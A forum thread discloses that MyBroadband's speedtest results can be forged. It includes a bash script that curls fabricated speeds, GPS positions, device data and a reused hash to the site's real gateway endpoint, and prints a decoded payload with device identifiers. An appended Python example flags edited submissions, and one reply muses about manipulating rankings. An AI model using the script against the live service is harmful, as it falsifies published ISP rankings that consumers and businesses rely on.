Deconstructing MyBroadband's Speedtest system

Some of the most interesting nerd stuff regarding mybb and they completely ignore this thread.
Meh.

More reps to Waylander.
 
Anyone have a contact at Vodacom PR I can speak to?
I see they're advertising on Highveld in the morning that according to MyBroadband MTN has the fastest network.

Maybe you should phone in one morning, refer them to this thread and the MTN prediction.

...or maybe just ask MTN about it on Twitter/Facebook. I'm sure the masses will "demand" answers.
 
I see they're advertising on Highveld in the morning that according to MyBroadband MTN has the fastest network.

Maybe you should phone in one morning, refer them to this thread and the MTN prediction.

...or maybe just ask MTN about it on Twitter/Facebook. I'm sure the masses will "demand" answers.
On Jacaranda, it's the fastest Android-based network. Wtf... MTN run Android servers, and routers?
 
Oh damn, I noticed this too
Since 2017 and nothing done about it
 
Hey there,

I was going to write a better post, but I'm busy so I decided to just post what I had written so far.

MyBroadband's current system of measuring speedtests, which are then used as analytics data for their various partners, can easily be spoofed.

(1)
MyBroadband's system uses a simple HTTP request to post the data from the client device to their analytics server.

(1.1)

The desktop platform, found here: http://speedtest.mybroadband.co.za uses the following:



This will query the current speedtest ID, which can be popped into to view the current and all previous tests.



The above is where things get tasty (I chose to remove some information). I can simply edit the above data, and POST it, creating a valid result, which will then be used as part of the next "Top ISP blah blah" article. The same can be done for MyBroadband's mobile apps on iOS and Android - both on WiFi and cellular. Continue reading.

(1.2)

On the mobile apps, I can spoof both connection information, and geographic information.

Code:
#!/bin/bash
###############
#Generate spoofed GPS data from: http://www.geomidpoint.com/random/ in tab separated format and paste into geo_raw.txt
#awk '{print $2 " " $4}' geo_raw.txt > geo_data.txt
#Now geo_data.txt has $latitude $longitude formatted data
################

spoofedAccuracy="3"
spoofedDevice="iPhone X (GSM)"

while read -r geoData
    do
        clear
        spoofedLatitude=$(echo $geoData | awk '{print $1}')
        spoofedLongitude=$(echo $geoData | awk '{print $2}')
        spoofedHash=$(date +%s | md5sum | awk '{print $1}')
        spoofedDownload=$(( ( RANDOM % 50000 )  + 1 ))
        spoofedUpload=$(( ( RANDOM % 50000 )  + 1 ))
        spoofedLatency=$(( ( RANDOM % 20 )  + 1 ))
        curl -i -s -k  -X $'POST' -H $'Content-Type: application/x-www-form-urlencoded' -H $'User-Agent: okhttp/3.6.0' --data-binary $'action=result&ccode=za&longitude='$spoofedLongitude'&latitude=-'$spoofedLongitude'&accuracy=3&coordinates_mode=1&latency='$spoofedLatency'&download='$spoofedDownload'&upload='$spoofedUpload'&data_download=1654716&data_upload=34850&legacy=0&threads=10&misc=[B]%7B%221%22%3A%22357665058790519%22%2C%222%22%3A%22655020004420395%22%2C%223%22%3A%228ta%22%2C%224%22%3A%2265502%22%2C%225%22%3A%22za%22%2C%226%22%3A%22TelkomSA%22%2C%227%22%3A%2265502%22%2C%228%22%3A%22za%22%2C%2221%22%3A-127%2C%2222%22%3A%22Rockchip%22%2C%2223%22%3A%22H81930I%22%2C%229%22%3A56021515%2C%2210%22%3A2143813%2C%2211%22%3A19441912%2C%2212%22%3A441728%2C%2213%22%3A36579603%2C%2214%22%3A1702085%2C%2215%22%3A101%2C%2216%22%3A79732%2C%2245%22%3A309%2C%2226%22%3A-91%2C%2227%22%3A11%2C%2225%22%3A15%2C%2228%22%3A0%2C%2229%22%3A0%2C%2230%22%3A0%2C%2231%22%3A0%2C%2232%22%3A392568%2C%2233%22%3A118360%2C%2234%22%3A62328266%2C%2235%22%3A3023165%2C%2224%22%3A%22102.249.53.117%22%2C%2238%22%3A%225.1.1%22%2C%2239%22%3A%220%22%2C%2240%22%3A-1%2C%2241%22%3A-1%2C%2242%22%3A2%2C%2243%22%3A14%2C%2244%22%3A21%2C%2248%22%3A%221.4.1.0%22%2C%2249%22%3A%221%22%2C%2250%22%3A%22Auto%20select%20server%22%2C%2251%22%3A15%2C%2253%22%3A14%2C%2236%22%3A400%2C%2237%22%3A10118325246%7D&hash=7ebcfc2f827f36d83585e377011df1d5' [/B]$'http://speedtest.mybroadband.co.za/apps/gateway.php'
        echo $spoofedDownload
        echo $spoofedUpload   
        echo $spoofedLatency
    done < geo.txt
done;


The encoded part in bold can be decoded to:
Code:
{"1":"357665058790519","2":"655020004420395","3":"8ta","4":"65502","5":"za","6":"TelkomSA","7":"65502","8":"za","21":-127,"22":"Rockchip","23":"H81930I","9":56021515,"10":2143813,"11":19441912,"12":441728,"13":36579603,"14":1702085,"15":101,"16":79732,"45":309,"26":-91,"27":11,"25":15,"28":0,"29":0,"30":0,"31":0,"32":392568,"33":118360,"34":62328266,"35":3023165,"24":"102.249.53.117","38":"5.1.1","39":"0","40":-1,"41":-1,"42":2,"43":14,"44":21,"48":"1.4.1.0","49":"1","50":"Auto select server","51":15,"53":14,"36":400,"37":10118325246}

From the above, run on an Android test device, we can see that they collect information about the device's SIM network, current network, device name and hardware, OS version, app version, server used, and location information, all of which can be spoofed.

(2)
MyBroadband publishes their analytics data, sourced from the speedtest system, on their news site. This can potentially be abused by network operators or ISPs to improve their own image, or damage the image of their competitors.
Do I get a prize now?
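
Added example (not part of the original post and not MyBroadband's code): a server-side check over submissions in the form-encoded layout shown in the post, flagging the patterns such edited results leave behind: one `hash` reused across differing measurements, a `misc` IP that differs from the connection source, and one device identifier seen at many positions. Treating `misc` keys `1` and `24` as device identifier and client IP is an assumption read off the decoded sample; every sample value below is constructed.

```python
import json
from collections import defaultdict
from urllib.parse import parse_qs, urlencode

def parse_submission(source_ip, body):
    """Decode one form-encoded result body (field names as in the post)."""
    form = {k: v[0] for k, v in parse_qs(body).items()}
    misc = json.loads(form.get("misc", "{}"))
    return {"source_ip": source_ip, "hash": form.get("hash"),
            "claimed_ip": misc.get("24"),   # assumed: client-reported IP
            "device_id": misc.get("1"),     # assumed: device identifier
            "download": int(form["download"]),
            "position": (form.get("latitude"), form.get("longitude"))}

def flag_suspicious(records, max_positions=2):
    """Return {index: [reasons]} for results that look replayed or edited."""
    by_hash, by_device = defaultdict(list), defaultdict(set)
    for i, r in enumerate(records):
        by_hash[r["hash"]].append(i)
        by_device[r["device_id"]].add(r["position"])
    flags = defaultdict(list)
    for i, r in enumerate(records):
        # A signal, not proof: NAT can make these differ legitimately.
        if r["claimed_ip"] and r["claimed_ip"] != r["source_ip"]:
            flags[i].append("claimed IP differs from connection source")
        if len({records[j]["download"] for j in by_hash[r["hash"]]}) > 1:
            flags[i].append("hash reused with different measurements")
        if len(by_device[r["device_id"]]) > max_positions:
            flags[i].append("one device ID at many positions")
    return dict(flags)

def _body(lat, lon, down, ip, h, dev):
    """Build a constructed sample body in the same layout."""
    misc = json.dumps({"1": dev, "24": ip})
    return urlencode({"action": "result", "latitude": lat, "longitude": lon,
                      "download": down, "upload": 1000, "misc": misc, "hash": h})

# Constructed samples: (connection source IP, request body).
SAMPLES = [
    ("203.0.113.10", _body("-26.1", "28.0", 9000, "203.0.113.10", "aaaa", "1" * 15)),
    ("198.51.100.7", _body("-33.9", "18.4", 41000, "203.0.113.99", "bbbb", "0" * 15)),
    ("198.51.100.7", _body("-29.8", "31.0", 12000, "203.0.113.99", "bbbb", "0" * 15)),
    ("198.51.100.7", _body("-25.7", "28.2", 48000, "203.0.113.99", "bbbb", "0" * 15)),
]

if __name__ == "__main__":
    parsed = [parse_submission(ip, body) for ip, body in SAMPLES]
    for index, reasons in flag_suspicious(parsed).items():
        print(index, reasons)
```

These checks only surface careless edits after the fact; any value the client reports can be altered, so results meant for publication need a measurement the server takes itself.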
 
So since this has been resurrected, is this still an issue?
Can we be kingmakers in the next round?
 